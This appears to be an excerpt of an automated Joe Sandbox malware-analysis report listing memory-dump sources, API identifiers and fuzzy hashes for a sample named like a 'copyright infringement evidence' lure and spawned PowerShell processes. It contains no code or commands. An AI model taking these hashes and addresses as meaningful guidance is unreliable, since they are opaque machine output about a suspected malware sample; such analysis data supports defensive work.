                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressSingleWake
                                                                                                          • String ID: lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs$use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs
                                                                                                          • API String ID: 3114109732-122189663
                                                                                                          • Opcode ID: 641e9fd4d4e15c048ac8fd20213543877e4a954914eaa447044b89ec674f5dcc
                                                                                                          • Instruction ID: 69d7861c71506790b14ba88c9d3573b716dd8d20649942eb9c419ec48509b4fc
                                                                                                          • Opcode Fuzzy Hash: 641e9fd4d4e15c048ac8fd20213543877e4a954914eaa447044b89ec674f5dcc
                                                                                                          • Instruction Fuzzy Hash: 7431D122F06A5189FB00EB64D8813FC63B1BB44368F9685B1DE1D536E4EFB8A596C710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PerformanceQuery$CounterErrorFrequencyLast
                                                                                                          • String ID: called `Result::unwrap()` on an `Err` value
                                                                                                          • API String ID: 158728112-2333694755
                                                                                                          • Opcode ID: 4149d947d676b9329f083aaf84ba26cd551138cfac7b887b779167bc1ae0e1e1
                                                                                                          • Instruction ID: 986ec13ec4c2691ff16f82d41bcc776d01f9cf31740e6f583b940d292c8f07b3
                                                                                                          • Opcode Fuzzy Hash: 4149d947d676b9329f083aaf84ba26cd551138cfac7b887b779167bc1ae0e1e1
                                                                                                          • Instruction Fuzzy Hash: D401C022E16B4298F700BB60E4023FC7334FB40328FD54A31CA6D026E4DF78A265C760
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2162964266-0
                                                                                                          • Opcode ID: 612a21c11b84e73066ef923e8d03c3a4e3a0eb6a4d5b61cf33becb2315217e54
                                                                                                          • Instruction ID: 658a882e93ac360e9c7eb9e7b8d5a6803620f71b47f28129ad8b72064cef7cf8
                                                                                                          • Opcode Fuzzy Hash: 612a21c11b84e73066ef923e8d03c3a4e3a0eb6a4d5b61cf33becb2315217e54
                                                                                                          • Instruction Fuzzy Hash: BCA1E222B0A64250FBA4BB31D4403BDA360EB55BA0FC65071EE5D436B2DF7DE569CB20
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2162964266-0
                                                                                                          • Opcode ID: 974f106f1643bde153e12d58030abeb668c5ce119e7f2a96a1931578ae89d655
                                                                                                          • Instruction ID: 6a6449f58a15ac2ab5f5451fd7e4949eeaf77e12cde2560bbe887acd275596ac
                                                                                                          • Opcode Fuzzy Hash: 974f106f1643bde153e12d58030abeb668c5ce119e7f2a96a1931578ae89d655
                                                                                                          • Instruction Fuzzy Hash: D881F262B0665581FF14AB12D840369A760FB05FE4FA58431EE4C0BBA5CEBDF4A2CB10
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2162964266-0
                                                                                                          • Opcode ID: 2e7117f5f05f54950251d899217082eb263eeafa0bcfbc3eb7bbc74554e53a58
                                                                                                          • Instruction ID: 7f29c411c95e3d2d68e8ae4b2d9949a0260b819fcc303f172f6d5f90f3585abc
                                                                                                          • Opcode Fuzzy Hash: 2e7117f5f05f54950251d899217082eb263eeafa0bcfbc3eb7bbc74554e53a58
                                                                                                          • Instruction Fuzzy Hash: 6C512C1260E68240FBA1FB21D0547BEA764EF457A4F860171EE5E03BE2CEBDD508CB65
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2162964266-0
                                                                                                          • Opcode ID: 662e2c2e4d8a91c26e794770647e2da3914300ae23185a31ac576cdc692b9aca
                                                                                                          • Instruction ID: b8232ee695102b7c5968235688db237e557abfff28380f908096a773f1f778c3
                                                                                                          • Opcode Fuzzy Hash: 662e2c2e4d8a91c26e794770647e2da3914300ae23185a31ac576cdc692b9aca
                                                                                                          • Instruction Fuzzy Hash: 6641443270E68281FB61AF15E0403A9E761EB897D0F855035DB8D07AA6DFBDE145CB50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000001D.00000002.2309545115.00007FF83B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B9B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_29_2_7ff83b9b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f9b2a6d3989e12eee43be8d2bdcaea9a3d31b457dd0386c92b6a4c1f737a342a
                                                                                                          • Instruction ID: 9832c73505feb922a63fb84f9a21a30f89b91b4345ea5a10121c1b4324d173c7
                                                                                                          • Opcode Fuzzy Hash: f9b2a6d3989e12eee43be8d2bdcaea9a3d31b457dd0386c92b6a4c1f737a342a
                                                                                                          • Instruction Fuzzy Hash: CDD14662D0EACA4FE755EB6848595B97FE1EF16390B0801FFC48DCB0F7E908A8058391
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000001D.00000002.2308937479.00007FF83B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B8E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_29_2_7ff83b8e0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                          • Instruction ID: cdf86e39de3b2e169b40985a8544fbbaae8d667bf7dd75582d3fe4ddcd0ba0f8
                                                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                          • Instruction Fuzzy Hash: 2201677111CB0C8FD744EF0CE451AA5B7E0FB95364F50056DE58AC3661D636E882CB45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000001E.00000002.2308444270.00007FF83B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B990000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_30_2_7ff83b990000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 758eedec9e1fb81c07e604054a46d5f4427836cbbc78562465e17ec0b8ca7dbe
                                                                                                          • Instruction ID: 5ece98d14cda60e6c04f0060044849397c8ac566ba7f3a63bcd1a45038623268
                                                                                                          • Opcode Fuzzy Hash: 758eedec9e1fb81c07e604054a46d5f4427836cbbc78562465e17ec0b8ca7dbe
                                                                                                          • Instruction Fuzzy Hash: 5FE14472D0EA8A4FE7D5EB2848191B97BA1EF55390B0801FBD48DCB1F7EA18AC05C751
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000001E.00000002.2308444270.00007FF83B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B990000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_30_2_7ff83b990000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 22135dcd257d874cba8022acf6f15c70210b348e24300bc1a211573d39b64e25
                                                                                                          • Instruction ID: 3e64862e49e876bdae2fac5f85e2e1c2c472df6a5f49478d549033e2a399b536
                                                                                                          • Opcode Fuzzy Hash: 22135dcd257d874cba8022acf6f15c70210b348e24300bc1a211573d39b64e25
                                                                                                          • Instruction Fuzzy Hash: 80A1E4A2D0EBC64FE7D69B2848691B47BE1EF56290B0900FBC48DCF1F7E918AC459711
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000001E.00000002.2307913119.00007FF83B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B8C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_30_2_7ff83b8c0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                          • Instruction ID: f41609f16c808c3e670c3bb1d1442fc3d2581255d48f81d1bd0d160b19bb3676
                                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                          • Instruction Fuzzy Hash: 6901677111CB0C8FDB44EF0CE451AA5B7E0FB95364F50056DE58AC3661D636E882CB45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000001F.00000002.2710786869.00007FF83B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B8F0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_31_2_7ff83b8f0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                          • Instruction ID: 5e0de48314f360aefb50b4e632567440c8348d6d98c905c4d1e9415e5dcba9f0
                                                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                          • Instruction Fuzzy Hash: EF01677111CB0D8FDB44EF0CE451AB6B7E0FB95364F50056DE58AC3661D636E882CB45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000021.00000002.2712055175.00007FF83B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B8E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_33_2_7ff83b8e0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                          • Instruction ID: e0509ab2e41031833ec60bc81ace29f63d51b00c98bf4c93d0d8a9d2854363a9
                                                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                          • Instruction Fuzzy Hash: C301677111CB0D8FD744EF0CE451AA6B7E0FB99364F50056DE58AC3661D636E882CB45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000023.00000002.2537505283.00007FF83B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B980000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_35_2_7ff83b980000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e8f9dd914d0bb58aed105a0ff6ea69a4ad2094fdcabc63f2c8395a3f66cfb975
                                                                                                          • Instruction ID: 50bcf8c95fed46edea7ae344dd3a6df2093f06f3bfa44158c1db70666621bda1
                                                                                                          • Opcode Fuzzy Hash: e8f9dd914d0bb58aed105a0ff6ea69a4ad2094fdcabc63f2c8395a3f66cfb975
                                                                                                          • Instruction Fuzzy Hash: 35637C3020DB888FDBB9EF1CC494E9AB7E1FBA9345F14055ED48DC7691CA31A885CB52
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000023.00000002.2537505283.00007FF83B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B980000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_35_2_7ff83b980000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8dcdc7add756f1b0142ee593b9813d507d4e8d787ca8a2adb5ba30dc6cfe6e62
                                                                                                          • Instruction ID: ed814ca52a028bfac4c82c91e1ba7b69bacce676091356ed25d4a0f52ea23877
                                                                                                          • Opcode Fuzzy Hash: 8dcdc7add756f1b0142ee593b9813d507d4e8d787ca8a2adb5ba30dc6cfe6e62
                                                                                                          • Instruction Fuzzy Hash: 7DD138A2D0DACA4FE7A5AB6888191B57BE1EF15390B0801FED49DCB0F7E919E805C351
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000023.00000002.2537505283.00007FF83B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B980000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_35_2_7ff83b980000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e342733e4efb56a04de43ccc46c09da6d2898f8cf7a356479d2a54ee626289dc
                                                                                                          • Instruction ID: 48e650b3ee4e6f6501f674d87cf53d294c83c761daf1e847dc501a174c862fc1
                                                                                                          • Opcode Fuzzy Hash: e342733e4efb56a04de43ccc46c09da6d2898f8cf7a356479d2a54ee626289dc
                                                                                                          • Instruction Fuzzy Hash: 70D11962D0EACA0FE7569A3C88592B47BE1EF57690B1801FBC48DCB1F7ED189C069351
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000023.00000002.2537505283.00007FF83B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B980000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_35_2_7ff83b980000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0f2a3723579750c9dbcb31760d253aa38752d46f716e2a0d9e50b3ed4e3c8338
                                                                                                          • Instruction ID: 9db25802a1f9242d33b89e56e946cfd566824b02365181121d0bf2486bdd2c39
                                                                                                          • Opcode Fuzzy Hash: 0f2a3723579750c9dbcb31760d253aa38752d46f716e2a0d9e50b3ed4e3c8338
                                                                                                          • Instruction Fuzzy Hash: E9411DA2E0ED8B0BF2999A3C9C992B461C2EF957D0F5801BDC84EC75F6ED09E8416241
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000023.00000002.2535070237.00007FF83B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_35_2_7ff83b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9b2da5ec297a2e55909547d2e7c4e5b75804f2d95c3c17cabb0e494d6746f0a2
                                                                                                          • Instruction ID: e435c68d66ba0ff4308f2efd76321ec410176031740a72f9fb9ccb0e4af4758b
                                                                                                          • Opcode Fuzzy Hash: 9b2da5ec297a2e55909547d2e7c4e5b75804f2d95c3c17cabb0e494d6746f0a2
                                                                                                          • Instruction Fuzzy Hash: 2201677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3661D636E881CB45
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000024.00000002.2540002662.00007FF83B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_36_2_7ff83b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: !]_H
                                                                                                          • API String ID: 0-411706013
                                                                                                          • Opcode ID: 64d12be1522bf4362bc6b785538ec902ecb627c8c4825f9651b31f837c21955c
                                                                                                          • Instruction ID: 93b02c3130274cbb5a19be5b7b9912404d03e7d544c94a04bd9d34a6b1cfcbcf
                                                                                                          • Opcode Fuzzy Hash: 64d12be1522bf4362bc6b785538ec902ecb627c8c4825f9651b31f837c21955c
                                                                                                          • Instruction Fuzzy Hash: 2E02E771A0DA4D8FDB94DF6CC491AA97BF1FF59380F1441AAD049C72A6CA34EC42CB81
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000024.00000002.2542881784.00007FF83B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B980000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_36_2_7ff83b980000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 040ee5c3af7d3ffe005f6ffd6d9db3db4964ed4ae19d6c71f221e287a0891485
                                                                                                          • Instruction ID: b15a432cb4694c7da7319cd6df46d649342c3968224deb431ae30575bd906d4c
                                                                                                          • Opcode Fuzzy Hash: 040ee5c3af7d3ffe005f6ffd6d9db3db4964ed4ae19d6c71f221e287a0891485
                                                                                                          • Instruction Fuzzy Hash: 08D10862D0EBCA4FE3959A3898691747BE1EF56690B0801FFC48DCB1FBED18AC058341
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000024.00000002.2542881784.00007FF83B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B980000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_36_2_7ff83b980000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f3beb2cfb3c5868f1389cd28a970265500d97621db6aaa0cb513572dd4b658e7
                                                                                                          • Instruction ID: 898364e9a2654d94d3c0bad0aefe0aaa00746011850226ced6d7ef87fd1a2766
                                                                                                          • Opcode Fuzzy Hash: f3beb2cfb3c5868f1389cd28a970265500d97621db6aaa0cb513572dd4b658e7
                                                                                                          • Instruction Fuzzy Hash: 82C1577290DACA4FE765EB6888591B97BD1EF56790B0401FEC48DCB0F7E918E805C341
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000024.00000002.2542881784.00007FF83B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B980000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_36_2_7ff83b980000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 303e2343a53a6e0b0f9f643e7fd9bc0f8bebb395c28568725c4d9d68f5eca1d6
                                                                                                          • Instruction ID: 3953c79fc6674ac515fabed07b6955e6126d9f86b1ebd04342e8722238b931b0
                                                                                                          • Opcode Fuzzy Hash: 303e2343a53a6e0b0f9f643e7fd9bc0f8bebb395c28568725c4d9d68f5eca1d6
                                                                                                          • Instruction Fuzzy Hash: C4B145B2D0DA8A5FE7A5EA2888581B97AD5EF55790F0801BED88DC70F7E918EC05C340
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000024.00000002.2542881784.00007FF83B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B980000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_36_2_7ff83b980000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 93e16f7c22655e3fbf25e920da9db0b2480b73b8190db445ccee5a0b9262eb39
                                                                                                          • Instruction ID: cd5e1ccf795446eb6f4493d090a7bddcf5295db1122b2e7c51b932572ff34bd8
                                                                                                          • Opcode Fuzzy Hash: 93e16f7c22655e3fbf25e920da9db0b2480b73b8190db445ccee5a0b9262eb39
                                                                                                          • Instruction Fuzzy Hash: 784100A2E0ED8F0BF2A9DA3C946927861D2EF947D0F54017DC84ECB5FAED1DE8015241
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000024.00000002.2540002662.00007FF83B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_36_2_7ff83b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6fa0c1df0529c257205177405531842769d4720fd81b6f65c985a473df4318a1
                                                                                                          • Instruction ID: 2b0725a26311159d3e8b1a07816cb1b3b34ffb9634f294f4c400d16ac9804bae
                                                                                                          • Opcode Fuzzy Hash: 6fa0c1df0529c257205177405531842769d4720fd81b6f65c985a473df4318a1
                                                                                                          • Instruction Fuzzy Hash: F301677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3661D636E881CB45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000024.00000002.2542881784.00007FF83B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B980000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_36_2_7ff83b980000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bcf33fce25bf885e09ed7ea92fd31b18cd1246a5fcf29cef29d0913a15c0a370
                                                                                                          • Instruction ID: 2868ccca65cab75ba3e899a2e93061e32a5a4dc2344fb52485f817ae3f0b5d17
                                                                                                          • Opcode Fuzzy Hash: bcf33fce25bf885e09ed7ea92fd31b18cd1246a5fcf29cef29d0913a15c0a370
                                                                                                          • Instruction Fuzzy Hash: C8F0C853F0EA8E5FE2A5E62C68682B877D1EF95690B0485FEC44EC71E7EC189C098351
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000024.00000002.2540002662.00007FF83B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_36_2_7ff83b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: af7bb477cecc22edda7271d489422bee1e431e55a07a4dd69802c2e1bf434aaa
                                                                                                          • Instruction ID: 34c16a11c8e61c2d4efa75e91352ca748232275506cbaac767565973d192a6a8
                                                                                                          • Opcode Fuzzy Hash: af7bb477cecc22edda7271d489422bee1e431e55a07a4dd69802c2e1bf434aaa
                                                                                                          • Instruction Fuzzy Hash: 58F0303275C6088FDB5CEA1CF8429B573D1EB99360B10056EE48BC36A7D927F8428685
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000002B.00000002.2481220701.00007FF83B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B990000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_43_2_7ff83b990000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bf5ddab82b23826301d689884b92c2c72dcbb73de08a8a8e84df9638b3b89216
                                                                                                          • Instruction ID: 028f1f5ca1053a58139012e35a4a0cf6efef5507264e055ea79814f142120cc2
                                                                                                          • Opcode Fuzzy Hash: bf5ddab82b23826301d689884b92c2c72dcbb73de08a8a8e84df9638b3b89216
                                                                                                          • Instruction Fuzzy Hash: 1BD12562D0EACA4FE7D6EB2848181B57FA1EF56790B0801FBD48DCB1F7E918A805C751
